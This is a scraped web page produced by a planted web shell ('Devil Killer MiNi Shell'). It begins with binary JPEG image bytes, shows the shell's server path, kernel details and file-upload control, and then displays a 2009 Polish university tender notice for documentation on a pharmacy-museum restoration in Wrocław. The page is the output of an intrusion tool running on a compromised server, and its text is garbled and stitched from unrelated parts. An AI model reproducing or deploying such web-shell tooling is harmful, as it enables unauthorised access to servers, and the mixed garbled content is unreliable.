JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090319/52631-N-2009.html

<p class="kh_header"><b>Wrocław: AM/AZ/PE-PN-3/09 
OPRACOWANIE STUDIUM WYKONALNOŚCI, PROGRAMU FUNKCJONALNO-UŻYTKOWEGO WRAZ Z PROGRAMEM KONSERWATORSKIM  I WNIOSKU APLIKACYJNEGO dla inwestycji o roboczym tytule DOM  ŚLĄSKIEGO APTEKARZA.</b><br>
<b>Numer ogłoszenia: 52631 - 2009; data zamieszczenia: 19.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Medyczna im. Piastów Śląskich , ul. Pasteura 1, 50-537 Wrocław, woj. dolnośląskie, tel. (071) 784 00 44; 784-11-73, faks (071) 784 00 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> AM/AZ/PE-PN-3/09 
OPRACOWANIE STUDIUM WYKONALNOŚCI, PROGRAMU FUNKCJONALNO-UŻYTKOWEGO WRAZ Z PROGRAMEM KONSERWATORSKIM  I WNIOSKU APLIKACYJNEGO dla inwestycji o roboczym tytule DOM  ŚLĄSKIEGO APTEKARZA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> AM/AZ/PE-PN-3/09 
Przedmiotem zamówienia jest wykonanie  niżej wymienionej dokumentacji  aplikacyjnej dla inwestycji o roboczym tytule Dom Śląskiego Aptekarza, którą Zamawiający złoży w  Zarządzie Województwa Dolnośląskiego będącej Instytucją Zarządzającą Regionalnym Programem dla Województwa Dolnośląskiego na lata 2007 - 2013,  przyjmującą wnioski o przyznanie środków finansowych, w ramach planowanego naboru wniosków w trybie konkursowym do Działania 6.4 Turystyka kulturowa oraz Działania 6.5  wspierającego infrastrukturę turystyczną i kulturową.
   Zamawiający planuje wykonanie prac rewitalizacyjnych zabytkowej kamienicy Akademii Medycznej we Wrocławiu zlokalizowanej przy ul. Kurzy Targ 4,  wpisanej do Wojewódzkiego Rejestru Zabytków - w zakresie gwarantującym  przywrócenie w dużej mierze pierwotnego wyglądu pomieszczeń  i ich adaptację architektoniczną dla potrzeb osób niepełnosprawnych (podjazdy, niwelacja progów, wyrównanie poziomów, winda w patio). Przedsięwzięcie zakłada również przystosowanie wskazanego budynku do celów prowadzenia szeroko pojętego muzeum aptekarstwa i farmacji. 
      W tym celu  Zamawiający zleca przygotowanie następującej dokumentacji :
1)	Studium Wykonalności dla inwestycji  pn Dom Śląskiego Aptekarza.
2)	Program Funkcjonalno-Użytkowy wraz z opracowaniem, wyceną szacunkową  kosztów  i  Programem  konserwatorskim  dla inwestycji pn.Dom Śląskiego Aptekarza
3)	Wniosek aplikacyjny dla inwestycji  pn. Dom Śląskiego Aptekarza..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.00.00.00-8, 79.41.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium w postępowaniu AM/AZ/ PE-PN-3/09<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy którzy:
a)	spełniają warunki zawarte w art. 22 ust. 1 p.z.p. 
b)	nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 p.z.p. 
c)	dysponują kadrą zdolną do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  posiadających co najmniej 3 letnie doświadczenie zawodowe w specjalnościach wymienionych poniżej tj.:

-  Specjalista ds. analiz ekonomiczno finansowych, który brał udział w przygotowaniu analiz ekonomicznych i finansowych będących elementem Studium Wykonalności dla co najmniej 1 projektu związanego z remontem i adaptacją (rewitalizacją) obiektu zabytkowego  o wartości inwestycji nie mniejszej niż 5.000.000,- PLN (pięć milionów PLN),
- Specjalista ds.  przygotowania Programu Funkcjonalno-Użytkowego wraz z wyceną szacunkową kosztów dla remontu i adaptacji minimum 1 obiektu zabytkowego o wartości inwestycji nie mniejszej niż 5.000.000,- PLN (pięć milionów PLN),
- Specjalista ds.  przygotowania wniosków o środki pomocowe, który brał udział w sporządzaniu co najmniej 1 aplikacji o środki pomocowe w wysokości nie mniejszej niż 5.000.000,- PLN (pięć milionów PLN).

d)	posiadają doświadczenie przy  realizacji każdego z wymienionych opracowań tj.: Studium Wykonalności, Programu Funkcjonalno-Użytkowego  i  Wniosku Aplikacyjnego uzyskane w okresie ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia,   a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dla przedsięwzięcia dotyczącego remontu i adaptacji obiektu zabytkowego o wartości inwestycji nie mniejszej niż 5.000.000,- PLN (pięć milionów PLN), współfinansowanego ze środków pomocowych. Wykonawca jest zobowiązany przedstawić  realizację każdego z  w/w wymienionych  opracowań (tj.: Studium Wykonalności, Programu Funkcjonalno-Użytkowego  i  Wniosku Aplikacyjnego ) dla inwestycji nie mniejszych niż 5.000.000,- PLN (pięć milionów PLN) każdy lub jednej inwestycji jeżeli dotyczyła opracowania  przez Wykonawcę dokumentacji : Studium Wykonalności, Programu Funkcjonalno-Użytkowego  i  Wniosku Aplikacyjnego, dla inwestycji dotyczącej remontu i adaptacji obiektu zabytkowego, realizowanej za środki pomocowe o wartości co najmniej 5 milionów PLN. 

          
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie   zamówienia, w/w warunki  pkt. a, c i d   mogą  oni spełniać łącznie, natomiast warunek pkt. b musi być spełniony przez każdego partnera  składającego ofertę wspólną.

Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu będzie dokonana  metodą /spełnia/nie spełnia/ w oparciu o informacje zawarte w oświadczeniach i dokumentach, jakich żąda Zamawiający, z zastrzeżeniem wykorzystania przepisu art. 26 ust. 3 i ust. 4  Pzp.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> DOKUMENTY WYMAGANE OD WYKONAWCÓW

a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c)	Załącznik nr 3 - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia  min 3 letniego przy wykonywaniu zamówień w zakresie przewidzianym w niniejszym zamówieniu - wzór wykazu stanowi  załącznik nr 3 do SIWZ. Wykaz musi potwierdzać spełnianie warunku udziału w postępowaniu  określonego w  pkt. 2c Siwz
d)	Załącznik nr  4 - wykaz wykonanych  a w przypadku świadczeń okresowych lub ciągłych również wykonywanych Studiów Wykonalności,  Programów funkcjonalno-Użytkowych i Wniosków Aplikacyjnych w okresie ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie. Wymagane jest  załączenie co najmniej jednego dokumentu  potwierdzającego spełnianie warunku udziału w postępowaniu określonego w pkt. 2d SIWZ) - wzór wykazu w załączniku nr 4 do Siwz. 
e)	Akceptacja projektu Umowy- zał. 5 do Siwz
f)	Pełnomocnictwo Pełnomocnika wykonawców występujących wspólnie - jeżeli zachodzi taka okoliczność
4. WYKONAWCY WYSTĘPUJĄCY WSPÓLNIE

Wykonawcy mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia. Oferta wspólna musi zostać przygotowana i złożona w następujący sposób:
a)	Partnerzy muszą ustanowić i wskazać Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Partnerów;
b)	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów;
c)	Każdy z Partnerów musi udokumentować, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1-2 Pzp.  składając  dokumenty wymienione w pkt. 3 a,b SIWZ 
d)	Dokumenty : Formularz Ofertowy- załącznik nr 1 do SIWZ,  oświadczenie o akceptacji przez Wykonawcę wzoru umowy - załącznik nr 7, oświadczenie o spełnianiu warunków udziału w niniejszym postępowaniu - załącznik nr 2 do SIWZ- powinny dotyczyć łącznie wszystkich Partnerów i powinny być podpisane przez ich prawomocnych przedstawicieli lub przez Pełnomocnika;
e)	Spełnienie warunków, o których mowa w pkt. 2 c,d  SIWZ, może nastąpić poprzez złożenie dokumentów dotyczących któregokolwiek z Partnerów lub łącznie  przez   Partnerów;  
f)	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.

5. ODPOWIEDNIKI DOKUMENTÓW WYMAGANE OD WYKONAWCÓW ZAGRANICZNYCH

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej przy składaniu wymaganych dokumentów zastosowanie ma § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 24 maja 2006 r. Nr 87 poz. 605)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.am.wroc.pl  link przetargi  Projekty zewnętrzne   2009 r  nr PE-PN-3/09.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.am.wroc.pl  link przetargi  Projekty zewnętrzne   2009 r  nr PE-PN-3/09.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2009 godzina 10:00, miejsce: AKADEMIA MEDYCZNA  WE WROCŁAWIU
Zespół ds. Zamówień Publicznych
ul. Mikulicza Radeckiego 5,  50 - 368 Wrocław
pokój 31.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com